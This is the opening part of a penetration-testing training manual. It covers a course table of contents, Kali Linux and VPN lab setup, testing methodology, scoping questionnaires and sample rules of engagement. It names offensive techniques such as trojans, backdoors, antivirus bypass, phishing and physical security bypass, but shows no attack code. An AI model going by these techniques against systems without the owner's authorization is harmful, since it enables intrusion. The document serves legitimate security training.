TRANCHULAS

Hands-On Ethical Hacking

and Penetration Testing
Training Course
Certified Penetration Testing Professional (CPTP)

Delegate Manual
v1.1

Web: www.tranchulas.com | Email: [email protected]

Hands-On Ethical Hacking and Penetration Testing Training Course

All rights reserved to Tranchulas Limited

No part of this publication, in whole or in part, may be reproduced, copied,

transferred or any other right reserved to its copyright owner, including
photocopying and all other copying, any transfer or transmission using any
network or other means of communication, any broadcast for distant
learning, in any form or by any means such as any information storage,
transmission or retrieval system, without prior written permission from
Tranchulas Limited.

TRANCHULAS | www.tranchulas.com 2
Hands-On Ethical Hacking and Penetration Testing Training Course

Table of Contents
Schedule of Training .................................................................................................................................... 6
Module 0: Introduction................................................................................................................................. 8
General Information ................................................................................................................................ 9
Legal ......................................................................................................................................................... 9
Tranchulas Online Labs ............................................................................................................................ 9
Certification Exam ................................................................................................................................. 10
Support .................................................................................................................................................. 10
Module 1: VMWare and Kali Linux Installation ....................................................................................... 11
Mandatory Laptop Requirements ......................................................................................................... 12
Installing VMWare on Windows ........................................................................................................... 12
Setting Up Kali Linux in VMWare .......................................................................................................... 15
Starting Kali Linux in VMWare .............................................................................................................. 21
Installing VMWare Tools: ...................................................................................................................... 28
Setting up the VPN access: .................................................................................................................... 28
Module 2: Planning and Scoping ............................................................................................................... 32
What is Penetration Testing? ................................................................................................................ 33
Types of Penetration Testing: ............................................................................................................... 33
Variations of Penetration Test: ............................................................................................................. 34
Penetration Testing Methodology: ....................................................................................................... 34
Penetration Testing Scoping: ................................................................................................................ 36
Module 3: Introduction to Kali Linux ........................................................................................................ 46
Familiarize with Directory Structure ..................................................................................................... 47
Changing Password ................................................................................................................................ 47
Search Files ............................................................................................................................................ 48
Starting Network Services ..................................................................................................................... 48
SSH ......................................................................................................................................................... 49
VNC Server ............................................................................................................................................. 50
Apache ................................................................................................................................................... 51
TFTPD ..................................................................................................................................................... 51
Module 4: Information Gathering .............................................................................................................. 53
Google Hacking ...................................................................................................................................... 54
Google Hacking Database ...................................................................................................................... 57

TRANCHULAS | www.tranchulas.com 3
Hands-On Ethical Hacking and Penetration Testing Training Course

Email Harvesting .................................................................................................................................... 58

Netcraft .................................................................................................................................................. 59
Nslookup ................................................................................................................................................ 60
DNSEnum ............................................................................................................................................... 61
DNSmap ................................................................................................................................................. 61
Maltego .................................................................................................................................................. 62
Module 5: Scanning ................................................................................................................................... 68
Introduction to Port Scanning ............................................................................................................... 69
TCP Port Scanning .................................................................................................................................. 69
SYN Scanning ......................................................................................................................................... 69
UDP Scanning ......................................................................................................................................... 69
Legal Implications .................................................................................................................................. 69
Nmap ...................................................................................................................................................... 70
Scan all available ports .......................................................................................................................... 72
OS Fingerprinting ................................................................................................................................... 72
Scanning the network ............................................................................................................................ 73
Service Enumeration.............................................................................................................................. 74
Zenmap .................................................................................................................................................. 74
Nmap Scripting Engine – Basic Usage ................................................................................................... 75
Execute SMB Version Scanning Script ................................................................................................... 75
Run Default Scripts ................................................................................................................................ 76
Running External Sources Script............................................................................................................ 76
Hping ...................................................................................................................................................... 76
Sparta ..................................................................................................................................................... 78
Module 6: Vulnerability Scanning ............................................................................................................. 80
What is OpenVAS? ................................................................................................................................. 81
Nexpose Vulnerability Scanner ............................................................................................................. 84
Nessus Vulnerability Scanner ................................................................................................................ 99
Module 7: ARP Spoofing ......................................................................................................................... 108
What is ARP Spoofing? ........................................................................................................................ 109
Ettercap ................................................................................................................................................ 109
DNS Spoofing ....................................................................................................................................... 110
SSL Man in the Middle ......................................................................................................................... 111

TRANCHULAS | www.tranchulas.com 4
Hands-On Ethical Hacking and Penetration Testing Training Course

Traffic Forgery ...................................................................................................................................... 112

SSH Downgrade Attack ........................................................................................................................ 114
Module 8: Exploitation............................................................................................................................. 117
Netcat................................................................................................................................................... 118
Metasploit ............................................................................................................................................ 119
Msfconsole ........................................................................................................................................... 119
Using Exploits ....................................................................................................................................... 120
The Famous MS08-067 ........................................................................................................................ 123
Password Sniffing with Metasploit ..................................................................................................... 125
Footprinting MySQL ............................................................................................................................. 125
SMB Version Scanning ......................................................................................................................... 126
Importing External Modules in Metasploit ......................................................................................... 126
Client Side Attacks ............................................................................................................................... 127
Meterpreter Shell ................................................................................................................................ 130
Persistent Backdoors ........................................................................................................................... 133
Linux Trojan ......................................................................................................................................... 135
Bypassing Antivirus.............................................................................................................................. 137
FatRat ................................................................................................................................................... 141
PDF Exploit ........................................................................................................................................... 146
VBScript Infection ................................................................................................................................ 148
Weaponizing Excel Worksheets Using Veil ......................................................................................... 155
Pivoting ................................................................................................................................................ 162
Cisco Exploits ....................................................................................................................................... 166
Phishing ................................................................................................................................................ 167
John the Ripper .................................................................................................................................... 168
Module 9: More Exploitation ................................................................................................................... 171
Social Engineering Toolkit ................................................................................................................... 172
Spear Phishing Attacks ........................................................................................................................ 172
Website Attack Vector......................................................................................................................... 173
Java Applet Attack Method ................................................................................................................. 174
Metasploit Browser Exploit Method ................................................................................................... 174
Browser autopwn ................................................................................................................................ 178
Module 10: Web Application Hacking..................................................................................................... 180

TRANCHULAS | www.tranchulas.com 5
Hands-On Ethical Hacking and Penetration Testing Training Course

Information Gathering......................................................................................................................... 181

Introduction to Burp Suite................................................................................................................... 183
Fingerprinting using Wapplyzer .......................................................................................................... 189
SQL Injection ........................................................................................................................................ 190
Injection Points ................................................................................................................................ 191
Authentication Bypass ..................................................................................................................... 193
Data Extraction ................................................................................................................................ 194
SQL Injection (Union) ....................................................................................................................... 196
SQLMap ............................................................................................................................................ 199
Cross Site Scripting (XSS) ..................................................................................................................... 203
Reflected XSS ................................................................................................................................... 203
Stored (Persistent) XSS .................................................................................................................... 205
iFrame Injection ............................................................................................................................... 206
BeEF .................................................................................................................................................. 207
File Inclusions....................................................................................................................................... 211
Local File Inclusion ........................................................................................................................... 211
Remote File Inclusion ...................................................................................................................... 214
Remote File Upload ......................................................................................................................... 216
Module 11: Wireless Penetration Testing ................................................................................................ 219
Hacking Wireless with Wi-Fi Pineapple Nano ..................................................................................... 220
Capture WPA/WPA2 Handshake......................................................................................................... 228
WPS Brute Force .................................................................................................................................. 235
Capturing Traffic .................................................................................................................................. 239
Airodump-ng ........................................................................................................................................ 241
Aireplay-ng ........................................................................................................................................... 242
Demo Attack ........................................................................................................................................ 244
Module 12: Other Attacks ........................................................................................................................ 249
LAN Turtle ............................................................................................................................................ 250
References ................................................................................................................................................ 259

Schedule of Training
TRANCHULAS | www.tranchulas.com 6
Hands-On Ethical Hacking and Penetration Testing Training Course

Day 1
Start Time Finish Time Module Name
10:00 10:15 Module 1: VMware and Kali Linux Installation
10:15 11:30 Module 2: Planning and Scoping
11:30 13:00 Module 3: Introduction to Kali Linux
13:00 14:00 Lunch Break
14:00 17:00 Module 4: Information Gathering

Day 2
Start Time Finish Time Module Name
10:00 11:00 Module 5: Scanning
11:00 13:00 Module 6: Vulnerability Scanning
13:00 14:00 Lunch Break
14:00 15:30 Module 7: ARP Spoofing
15:30 17:00 Module 8: Exploitation

Day 3
Start Time Finish Time Module Name
10:00 12:00 Module 8: Exploitation (continued)
12:00 13:00 Module 9: More Exploitation
13:00 14:00 Lunch Break
14:00 17:00 Module 9: More Exploitation (continued)

Day 4
Start Time Finish Time Module Name
10:00 11:30 Module 10: Web Application Hacking (continued)
11:30 13:00 Module 11: Wireless Penetration Testing
13:00 14:00 Lunch Break
14:00 15:00 Module 11: Wireless Penetration Testing (continued)
15:00 17:00 Module 12: Other Attacks

TRANCHULAS | www.tranchulas.com 7
Hands-On Ethical Hacking and Penetration Testing Training Course

Module 0: Introduction

TRANCHULAS | www.tranchulas.com 8
Hands-On Ethical Hacking and Penetration Testing Training Course

General Information

The need to understand hacker and his methods are vital for better defending IT infrastructure
of your organization. This training course is designed for students who want to get acquainted
with the world of hacking. It offers a collection of live demonstrations featuring variety of hacking
and defensive techniques used by hackers.

Legal

The following document contains hacking techniques that should only be performed inside the
Tranchulas Lab Environment. Please note that without prior consent and permission of system’s
owner, launching attacks described in this manual are illegal. Tranchulas assumes no
responsibility for any actions performed outside its lab environment.

Tranchulas Online Labs

Tranchulas Online Labs are available 24×7 for practicing hacking techniques and tools
demonstrated by our instructor during the training course. Online Labs simulate corporate
network with several subnets, each protected by firewall. All machines on the network can be
exploited and have different difficulty levels.

Students are required to discover and exploit vulnerabilities in order to pass online labs and
receive Tranchulas Certified Penetration Testing Professional (CPTP) Certification.

TRANCHULAS | www.tranchulas.com 9
Hands-On Ethical Hacking and Penetration Testing Training Course

Certification Exam

The certification exam comprises of multiple challenges to put your skills to the test. You will be
given multiple targets to exploit and create a penetration testing report. The exam duration is 24
hours. You should complete the tasks and submit the report within this time. The targets will be
similar to lab machines which will require various steps in order to be exploited successfully. A
sample report will be provided with the exam document once you have scheduled your exam
date. You can schedule your exam at any date and time. Make sure you tell us 1 week before the
exam date so that we can make the necessary arrangements.

Support
You can connect with Tranchulas Online labs for 90 days to practice your hacking kung-fu after
the training course. During this time our technical team will provide you email/phone/skype
support in order to ensure the skills acquired on the training course are being applied correctly.

TRANCHULAS | www.tranchulas.com 10
Hands-On Ethical Hacking and Penetration Testing Training Course

Module 1: VMWare and Kali Linux

Installation

TRANCHULAS | www.tranchulas.com 11
Hands-On Ethical Hacking and Penetration Testing Training Course

Mandatory Laptop Requirements

• CPU: 2 GHz or higher

• Minimum: 4 GB RAM
• 20 GB of free space on your Hard Drive
• Wireless 802.11 b/g
• Should have the capability to have local administrator access within the Operating
System and disable antivirus if required
• You must also setup a windows virtual machine on your system if your primary OS is not
windows.

Installing VMWare on Windows

1. Download the latest version of VMware workstation from:
https://my.vmware.com/en/web/vmware/info/slug/desktop_end_user_computing/vm
ware_workstation_pro/14_0
2. You can obtain a free 30-day license if you already do not own a copy of VMware.
3. Log on to your Microsoft Windows host as the Administrator user or as a user who is a
member of the Windows Administrators group.
4. Browse to the directory where you saved the downloaded installer file and run the
installer.
5. Click Next to dismiss the Welcome dialog box.

TRANCHULAS | www.tranchulas.com 12
Hands-On Ethical Hacking and Penetration Testing Training Course

6. Select Typical Installation.

7. Choose the directory where you want to install VMware Workstation.

8. To install it in a directory other than the default, click Change and browse to your
directory of choice. If the directory does not exist, the installer creates it for you. Click
Next.
9. Caution: Do not install VMware Workstation on a network drive.
10. Select the shortcuts that you want the installer to create.

TRANCHULAS | www.tranchulas.com 13
Hands-On Ethical Hacking and Penetration Testing Training Course

11. Choices include Desktop, and Start menu. Deselect any shortcuts you do not want the
installer to create.
12. If the installer detects that the Windows CD-ROM autorun feature is enabled, you see a
message that gives you the option to disable this feature. Disabling autorun prevents
undesirable interactions with the virtual machines you install on this system.
13. The installer has gathered the necessary information and is ready to begin installing the
software.

TRANCHULAS | www.tranchulas.com 14
Hands-On Ethical Hacking and Penetration Testing Training Course

14. If you want to change any settings or information you provided, now is the time to
make those changes. Click back until you reach the dialog box containing the
information you want to change.
15. If you do not need to make any changes, click Install. The installer begins copying files
to your computer.
16. Some installations may require that you reboot your PC. Reboot now to allow VMware
Workstation to complete the installation correctly.
17. After the installation is over, it prompts for Evaluation key which you must have
received in your Email

18. One has an option to Skip it or enter it here. Skipping it will finish the installation but
later it will be necessary to input the key.

Setting Up Kali Linux in VMWare

1. Start VMware Workstation.
Double-click the VMware Workstation icon on your desktop or use the Start menu (Start
> Programs > VMware > VMware Workstation).
2. It will prompt the License Agreement, Accept it to go ahead.

TRANCHULAS | www.tranchulas.com 15
Hands-On Ethical Hacking and Penetration Testing Training Course

3. Start the New Virtual Machine Wizard.

When you start VMware Workstation, you can open an existing virtual machine or create a
new one. Choose File > New > Virtual Machine to begin creating your virtual machine.
4. Select Custom and click Next

TRANCHULAS | www.tranchulas.com 16
Hands-On Ethical Hacking and Penetration Testing Training Course

5. Download Kali Linux ISO from https://www.kali.org/downloads/3/ . In Guest Operating

System Installation, select Installer disc image file (iso) and Click Browse. Locate your Kali
Linux iso and select it. Click Next.

TRANCHULAS | www.tranchulas.com 17
Hands-On Ethical Hacking and Penetration Testing Training Course

6. In Select a Guest Operating System select Linux and in drop down select Debian 8.x 64-bit
as version if you have 64 bit ISO or select Debian 8.x if you are using 32 bit version. Click
Next.

7. Give your Virtual Machine a name.

TRANCHULAS | www.tranchulas.com 18
Hands-On Ethical Hacking and Penetration Testing Training Course

8. Select the hard disk size you want to give to this machine, 20 GB is enough for Kali. Set
other requirements as well. Which includes RAM 1 GB is enough but 2 GB is
recommended. Set Networking mode from NAT to Bridged Mode

TRANCHULAS | www.tranchulas.com 19
Hands-On Ethical Hacking and Penetration Testing Training Course

9. Select LSI Logic for the Controller Types and SCSI for Disk Type.

TRANCHULAS | www.tranchulas.com 20
Hands-On Ethical Hacking and Penetration Testing Training Course

10. Launch your machine

Starting Kali Linux in VMWare

1. Click the Power On button to start the virtual machine.
2. Select Graphical Install.

TRANCHULAS | www.tranchulas.com 21
Hands-On Ethical Hacking and Penetration Testing Training Course

3. Select your preferred language and then your country location. You’ll also be prompted
to configure your keyboard with the appropriate keymap.

TRANCHULAS | www.tranchulas.com 22
Hands-On Ethical Hacking and Penetration Testing Training Course

4. The installer will copy the image to your hard disk, probe your network interfaces, and
then prompt you to enter a hostname for your system. In the example below, we’ve
entered “kali” as our hostname.

5. Enter a strong password for root account.

TRANCHULAS | www.tranchulas.com 23
Hands-On Ethical Hacking and Penetration Testing Training Course

6. Select your time zone.

7. The installer will now probe your disks and offer you four choices. In our example, we’re
using the entire disk on our computer and not configuring LVM (logical volume manager).
Experienced users can use the “Manual” partitioning method for more granular
configuration options.

TRANCHULAS | www.tranchulas.com 24
Hands-On Ethical Hacking and Penetration Testing Training Course

8. Select All files in one partition

9. Next, you’ll have one last chance to review your disk configuration before the installer
makes irreversible changes. After you click Continue, the installer will go to work and
you’ll have an almost finished installation.
TRANCHULAS | www.tranchulas.com 25
Hands-On Ethical Hacking and Penetration Testing Training Course

10. Configure network mirrors. Kali uses a central repository to distribute applications. You’ll
need to enter any appropriate proxy information as needed. Select YES

11. Install the GRUB.

TRANCHULAS | www.tranchulas.com 26
Hands-On Ethical Hacking and Penetration Testing Training Course

12. Finally, click Continue to reboot into your new Kali installation.

13. Go to Terminal

TRANCHULAS | www.tranchulas.com 27
Hands-On Ethical Hacking and Penetration Testing Training Course

14. Run the following commands:

root@kali:~# apt-get update

root@kali:~# apt-get upgrade
root@kali:~# apt-get dist-upgrade

Enter Y when prompted. It will take some time to install the software and necessary files
required.

Installing VMWare Tools:

To install VMWare tools open terminal and enter the following commands:

root@kali:~# apt-get install open-vm-tools-desktop fuse

root@kali:~# reboot

The VMware tools should be working after the reboot.

Setting up the VPN access:

1. In order to access the training environment, you need to setup the VPN in Kali Linux. You
will get a zip file from Tranchulas Training Team which includes all the VPN files. Extract
the files.

TRANCHULAS | www.tranchulas.com 28
Hands-On Ethical Hacking and Penetration Testing Training Course

You will get a folder named untangle-vpn. Folder includes the necessary files required for setting
up VPN connection.
2. Now run the following command

root@kali:~# apt-get install network-manager-openvpn

3. Restart Kali Linux.

4. Now go to settings by pressing power button on the top right of screen.

5. Go to Network and click on the + button.

6. Click on VPN

7. Select Import from file

TRANCHULAS | www.tranchulas.com 29
Hands-On Ethical Hacking and Penetration Testing Training Course

8. Select the .ovpn file from the directory where you have extracted the zip.

9. It will automatically populate the settings. Now click Add.

TRANCHULAS | www.tranchulas.com 30
Hands-On Ethical Hacking and Penetration Testing Training Course

10. Turn on the VPN.

TRANCHULAS | www.tranchulas.com 31
Hands-On Ethical Hacking and Penetration Testing Training Course

Module 2: Planning and Scoping

TRANCHULAS | www.tranchulas.com 32
Hands-On Ethical Hacking and Penetration Testing Training Course

What is Penetration Testing?

Penetration testing is a controlled and managed simulation of a computer system intrusion. It
gives a realistic experience of an attempted break-in into network, system or an application.
During a penetration test, security mechanisms as well as intrusion detection and response
capabilities are put to the test against a skilled, motivated attacker - only this time owner of target
has a complete insight. This is a unique opportunity to get to know your enemy and the harm it
may cause without the damage you would sustain in a real attack.

Penetration Testing helps organizations to:

• Understand threats for better defense
• Determine risk to make informed IT decisions
• Test incident handling procedures
• Test Intrusion detection and prevention systems
• Identify how your security is working overall in your organization

Penetration Testing is not:

• Using vulnerability scanners to generate a report
• An activity that will identify 100% vulnerabilities

Types of Penetration Testing:

There are two types of penetration testing:
1. External Penetration Testing: External pen-testing addresses the ability of a remote
attacker to get to the internal network. The goal of the pen-test is to access specific
servers and crown jewels within the internal network by exploiting externally exposed
servers, clients, and people. Whether it's an exploit against a vulnerable Web application
or tricking a user into giving his password over the phone, allowing access to the VPN, the
end game is getting from the outside to the inside. This testing has its focus on the
infrastructure components, servers, and the related software of the target. It also
provides a detailed analysis of the information that is available from public sources, such
as the Internet. Enumeration of the network is also performed and analyzed. The filtering
devices, such as firewalls and routers, are also scrutinized for their vulnerabilities. Finally,
the impact and consequences are accessed.
2. Internal Penetration Testing: Internal Penetration Testing simulates what an insider
attack could accomplish. The target is typically the same as external pen-testing, but the
major differentiator is the "attacker" either has some sort of authorized access or is
starting from a point within the internal network. Insider attacks have the potential of
being much more devastating than an external attack because insiders already have the
knowledge of what's important within a network and where it's located, something that
external attackers don't usually know from the start.

TRANCHULAS | www.tranchulas.com 33
Hands-On Ethical Hacking and Penetration Testing Training Course

Variations of Penetration Test:

The two types of penetration have three variations, each depending on the degree of knowledge
provided by the target company to the pen testing team.
1. Black Box Testing: This testing does not provide the tester with any information and
therefore is a much better testing method because crackers and script kiddies normally
do not have any information that is directly obtained from the target company and need
to gather their information from public sources. It simulates real-world attack scenarios.
The steps of mapping the network, enumerating shares and services, and operating
system fingerprinting are typical for black box testing.
2. White box Testing: For this, related information is provided and is done so to assess the
security against specific attacks or specific targets. This is the chosen method when the
company needs to get a complete audit of its security.
3. Grey box Testing: In this testing, some knowledge is provided to the testers but this
testing puts the tester in a privileged position. This would normally be a preferred method
when cost is a factor as it saves time for the pen testing team to uncover information that
is publicly available. Also, this approach would be suitable when the organization needs
to obtain knowledge of the security assessment practices.

Penetration Testing Methodology:

Penetration testing consists of three phase approach. The approach includes following three
phases:
Phase – I Planning and Preparation
Phase – II Assessment
Phase – III Reporting and Clean-up

Phase – I: Planning and Preparation

This phase comprises the steps to exchange initial information, plan and prepare for the test.
Prior to testing a formal Assessment Agreement will be signed between both parties. It will
provide basis for this assignment and mutual legal protection. It will also specify the specific
engagement team, the exact dates, times of the test, escalation path and other arrangements.
The following activities are envisaged in this phase:

• Identification of contact individuals from both side,

• Opening meeting to confirm the approach and methodology, and
• Agree to specific test cases and escalation paths

Phase – II: Assessment

This is the phase where pen testing team will actually carry out the Penetration test. In the
assessment phase a layered approach is followed. The following layers are envisaged:
TRANCHULAS | www.tranchulas.com 34
Hands-On Ethical Hacking and Penetration Testing Training Course

• Information Gathering
• Network Mapping
• Vulnerability Identification
• Penetration
• Gaining Access & Privilege Escalation
• Enumerating Further
• Compromise Remote Users/Sites
• Maintaining Access
• Covering Tracks
The execution steps are cyclical and iterative hence represented by the circular arrows in the
assessment phase in the figure below:

TRANCHULAS | www.tranchulas.com 35
Hands-On Ethical Hacking and Penetration Testing Training Course

Phase – III: Reporting and Clean-up

In the course of penetration testing if a critical issue is identified, it must be reported immediately
to ensure that client is aware of it. At this point criticality of issue should be discussed and
countermeasure to safeguard against this issue must be provided.
After the completion of all test cases defined in scope of work, a written report describing the
detailed results of the tests and reviews should be prepared with recommendations for
improvement. The report should follow a well-documented structure. Things that should be
definitely in the report are the following sections:
a) Management Summary
b) Scope of the project (and Out of Scope parts)
c) Tools that have been used (including exploits)
d) Dates & times of the actual tests on the systems
e) Every single output of tests performed (excluding vulnerability scan reports which can be
included as attachments)
f) A list of all identified vulnerabilities with included recommendations on how to solve the
issues found.
g) A list of Action points (what recommendation to perform first, what is the recommended
solution)

Penetration Testing Scoping:

Sample Scope Sheet

Introduction
In order to make a correct sizing of the work to be carried out, we ask you to please complete
the following form as accurately as possible.

Personal Information
Complete Name:
Company:
Position:
Email:

Type of Analysis
Please select the type of analysis required. Internal Penetration Tests are performed from the
LAN or DMZ standpoint of the company, while the External Penetration Tests are performed from
the Internet, with the same exposure that a potential intruder has:

TRANCHULAS | www.tranchulas.com 36
Hands-On Ethical Hacking and Penetration Testing Training Course

Internal Penetration Test

External Penetration Test

Domains
Please list the domains belonging to the company or organization:
1)
2)
3)
4)

Network Security Assessment

In this section, you need to complete the network elements that will be part of the security
assessment. Each field requires the amount of such elements within the network. For example,
in the "Public IP Addresses" you must complete with 1, 8, 24, or the number of addresses that
you want to analyze.

Public IP Addresses:
Routers:
Firewalls:
VPN tunnels:
DNS servers:
Mail servers:
FTP servers:
SSH servers:
Database servers:
HTTP servers:
Other services or equipment that you would like to include in the assessment (please be specific):

Web Application Security Assessment

TRANCHULAS | www.tranchulas.com 37
Hands-On Ethical Hacking and Penetration Testing Training Course

Access URL:
Main Web Application feature:
Approximated number of URLs:
Describe the application sections:
Approximated number of URLs accessible only after authentication:
Approximated number of Web forms:
List the different types of users (roles) that access to the application:
List the programming languages used to develop the Web application:
List the used Web development frameworks (eg Smarty, HDIV, Spring, Spring Security, Django):
ActiveX components are used in Web application:
The application uses Flash heavily (check yes, if you use Flash for more than menus and banners):
The application uses Java applets:
The application uses AJAX:
The application handles sensitive customer information from the company:
The application is used to make purchases online or other tasks where money is involved directly:
Backend database used:
The Web application has interfaces with other systems (Tandem, Webservices, mail servers, etc.)
Number of users using the application:
Describe in detail the application:

Example Form
The following is a form pre-completed by Tranchulas so that you have an example in case of not
knowing how to complete any of the previous sections.
Web Application:
Access URL: http://www.tranchulas.com
Main Web Application feature: It provides clients with access to information on services that
are conducted by Tranchulas.
Approximated number of URLs: 15

TRANCHULAS | www.tranchulas.com 38
Hands-On Ethical Hacking and Penetration Testing Training Course

Describe the application sections: It has different sections which give information on the
services of the company and the products offered. The list of trainings and the events
conducted by Tranchulas is also given.
Approximated number of URLs accessible only after authentication: 20
Approximated number of Web forms: 3
List the different types of users (roles) that access to the application: Tranchulas Employees and
Tranchulas Clients
List the programming languages used to develop the Web application: HTML, PHP
List the used Web development frameworks (eg Smarty, HDIV, Spring, Spring Security, Django):
None
ActiveX components are used in Web application: No
The application uses Flash heavily (check yes, if you use Flash for more than menus and banners):
No
The application uses Java applets: No
The application uses AJAX: No
The application handles sensitive customer information from the company: No
The application is used to make purchases online or other tasks where money is involved directly:
Yes
Backend database used: SQL
The Web application has interfaces with other systems (Tandem, Web services, mail servers,
etc.): SMTP daemon used to send emails to clients.
Number of users using the application: 100
Describe in detail the application: It has 5-6 different sections which deal with giving out
information on the activities/services and products offered by Tranchulas. The clients also have
the option of contacting the company as well as pay online through the website.

Scoping Questions
When you first start communicating with the customer there will be a set of questions that you
will need answered before you can accurately scope the penetration test engagement. These
questions are critical to ask and should give you a better understanding of what the client is
looking to gain out of the penetration test, why the client is looking to have a penetration test

TRANCHULAS | www.tranchulas.com 39
Hands-On Ethical Hacking and Penetration Testing Training Course

performed against their environment, and whether or not they want certain types of tests
performed during the penetration test.
The following are some sample questions that may need to be answered before you can even
accurately quote how much the engagement is going to cost the customer:

Network Penetration Test

1. Why is the customer having the penetration test performed against their environment?
2. Is the penetration test required for a specific compliance requirement?
3. When does the customer want the active portions (scanning, enumeration, exploitation,
etc...) of the penetration test conducted?
4. During business hours?
5. After business hours?
6. On the weekends?
7. How many total IP addresses are being tested?
8. How many internal IP addresses, if applicable?
9. How many external IP addresses, if applicable?
10. Are there any devices in place that may impact the results of a penetration test such as a
firewall, intrusion detection/prevention system, web application firewall, or load
balancer?
11. In the case that a system is penetrated, should we:
Perform a local vulnerability assessment on the compromised machine? Attempt to gain the
highest privileges (root on unix machines, SYSTEM or Administrator on Windows machines) on
the compromised machine? Perform no, minimal, dictionary, or exhaustive password attacks
against local password hashes obtained (for example, /etc/shadow on unix machines)?

Web Application Penetration Test

1. How many web applications are being assessed?
2. How many login systems are being assessed?
3. How many static pages are being assessed? (approximately)
4. How many dynamic pages are being assessed? (approximately)
5. Will the source code be readily for viewing?
6. Will there be any kind of documentation, and if yes what kind of documentation?
7. Will we be performing static analysis on this application?
8. Does the client want us to perform fuzzing against this application?
9. Does the client want us to perform role-based testing?
10. Does the client want us to perform credentialed scans of web applications?
Wireless Network Penetration Test
1. How many wireless networks are in place?

TRANCHULAS | www.tranchulas.com 40
Hands-On Ethical Hacking and Penetration Testing Training Course

2. Is a guest wireless network used? If so:

3. Does the guest network require authentication?
4. What type of encryption is used on the wireless networks?
5. What is the square footage of coverage?
6. Will we be enumerating rogue devices?
7. Will we be assessing wireless attacks against clients?
8. Approximately how many clients will be using the wireless network?

Physical Penetration Test

1. How many locations are being assessed?
2. Is this physical location a shared facility? If so:
3. How many floors are in scope?
4. Which floors are in scope?
5. Are there any security guards that will need to be bypass? If so:
6. Are the security guards employed through a 3rd party? Are they armed? Are they allowed
to use force?
7. How many entrances are there into the building?
8. Is the use of lock picks or bump keys allowed?
9. Will we be performing a physical penetration test to verify compliance with existing
policies and procedures or just performing an audit?
10. What is the square footage of the area in scope?
11. Are all physical security measures documented?
12. Are video cameras being used? If so and they are client owned:
13. Does the client want us to attempt to gain access to where the video camera data is
stored?
14. Is there an armed alarm system being used? If so:
15. Is the alarm a silent alarm?
16. Is the alarm triggered by motion?
17. Is the alarm triggered by opening of doors and windows?

Social Engineering
1. Will the client provide e-mail addresses of personnel that we can attempt to social
engineer?
2. Will the client provide phone numbers of personnel that we can attempt to social
engineer?
3. Will we be attempting to social engineer physical access, if so:?
4. How many people will be targeted?
It should be noted that as part of different levels of testing the questions for business unit
manager’s systems administrators and help desk personnel may not be required. However, feel
free to use the following questions as a guide.

TRANCHULAS | www.tranchulas.com 41
Hands-On Ethical Hacking and Penetration Testing Training Course

Questions for Business Unit Managers

We cannot ignore the business unit managers when a test is being performed. These tend to be
the individuals who would be most impacted if a DoS condition occurred.
1. Do you know a test is about to be performed?
2. What is the main datum that would create the greatest risk to the organization if exposed
corrupted or deleted?
3. Do you have testing and validation procedures to verify your business applications are
functioning properly?
4. Do you have your Quality Assurance testing procedures from when the application was
first developed?
5. Do you have Disaster Recovery Procedures for your application data?

Questions for System Administrators

We cannot ignore the power of systems administrators in security and for penetration testing.
They know their systems far better than anyone else in their organizations and if something goes
wrong they are most likely going to be the people on the front lines to restore operations. Many
of the questions below are based on the concept of Visible Operations.
1. Can you identify your fragile systems? (Ask about systems with tendencies to crash, have
older operating systems, or are not patched for any reason)
2. Are there systems on the network that IT does not own, that may require additional
approval to test?
3. Do you have Change Management procedures in place?
4. What is the mean time to repair systems outages?
5. Do you have any systems monitoring software in place?
6. What are your most critical servers and applications?
7. Do you test backups on a regular basis?
8. When was the last time you restored from backup?

Exercise
Find gaps in sample scope sheet.

Sample Rules of Engagement

1. The purpose of having the “Rules of Engagement” is to clearly establish the scope of work
and the procedures that will and will not be performed, by defining time frames, test
rules, and points of contact.
2. Penetration Test Purpose: The purpose is to assess the vulnerability of the customer’s IT
infrastructure and supporting Information Technology infrastructure regarding
unauthorized access from outside and inside of customer’s organization. The procedures

TRANCHULAS | www.tranchulas.com 42
Hands-On Ethical Hacking and Penetration Testing Training Course

are designed to be non-intrusive and are intended to validate security configuration

controls that protect systems that are relevant to Company X targets.
3. Penetration Test Objective: The objectives of the testing are to:-
a) Evaluate the protection of customer’s information technology assets (i.e., data,
systems, and processes), with a special emphasis on the effectiveness of logical access
and system software controls
b) Provide value to the customer’s IT infrastructure by identifying opportunities to
significantly strengthen applicable controls within budgetary and operational
constraints
4. Scope: Company X penetration procedures will remotely (via internet) test (targeting
email addresses of customer employees, finding critical information through public
sources) as well as locally (within customer’s facilities) scan all network, applications,
database and servers supporting customer as well as any other IT infrastructure
components deemed critical in supporting customer’s operating environment.
Company X test procedures will use non-destructive testing techniques (i.e., no files or
data on the target systems are to be modified, added, deleted, or changed). Evidence to
support any access control weaknesses discovered should consist primarily of screen
prints and session logs.
5. Activities to be conducted: Following activities are associated with black box penetration
testing:
a) Identify Targets.
b) Identify Potential Vulnerabilities.
c) Perform Vulnerability Scans.
d) Identify and exploit improperly configured network services.
e) Identify and exploit insecure authentication mechanisms.
f) Identify outdated network services that have known vulnerabilities.
g) Apply enumeration data in searching vulnerable databases.
h) Perform manual tests.
i) Password guessing.
j) IP spoofing.
k) Social engineering.
l) Use Trojan and rootkit Attacks.
m) Use keylogging and bugging.
n) Manipulating routing tables.
o) Identify and exploit of rogue devices.
p) Research and develop attack scenarios.
q) Execute attacks.
r) Record results.
s) Report exploitable vulnerabilities.
t) Analyze penetration testing results and if indicated, perform additional exercises.
TRANCHULAS | www.tranchulas.com 43
Hands-On Ethical Hacking and Penetration Testing Training Course

u) Recommend countermeasures.
v) Assessment Tools: Most of the testing will be
6. Assessment Tools: Most of the testing will be performed on Linux distribution called Kali
Linux. Some customized windows based tools might also be used by Company X team.
Company X team will also prepare its own customized tools/scripts.
7. Wireless Testing Tools: Alfa wireless adapter (AWU036H) will be used to conduct wireless
attacks.
8. Rules to be Followed: The following are agreed upon rules that will be followed as part
of this penetration test:
a) Designated customer representatives will observe and/or be readily available to
discuss while in progress all Company X penetration/exploitation activities.
b) Penetrations into customer systems will only be pursued insofar as they could
lead/access to significant systems or are significant to the entity-wide security
program of the overall network environment.
c) All passwords compromised during testing will be reported to the designated contact
for resetting.
d) All Company X reports and work papers will be clearly labeled “Limited Distribution”.
e) A full network scan will be performed. A targeted network scan will be completed and
limited to the subnets and targeted hosts, so as to control and further minimize load
on the network infrastructure.
f) Company X team will refrain from any denial-of-service attempts.
g) In its penetration efforts, Company X will at no point alter or delete any directories or
files.
h) Trojans and backdoors will be removed and unloaded at the conclusion of test.
i) Utmost care will be exercised not to disable user IDs for any extended period of time.
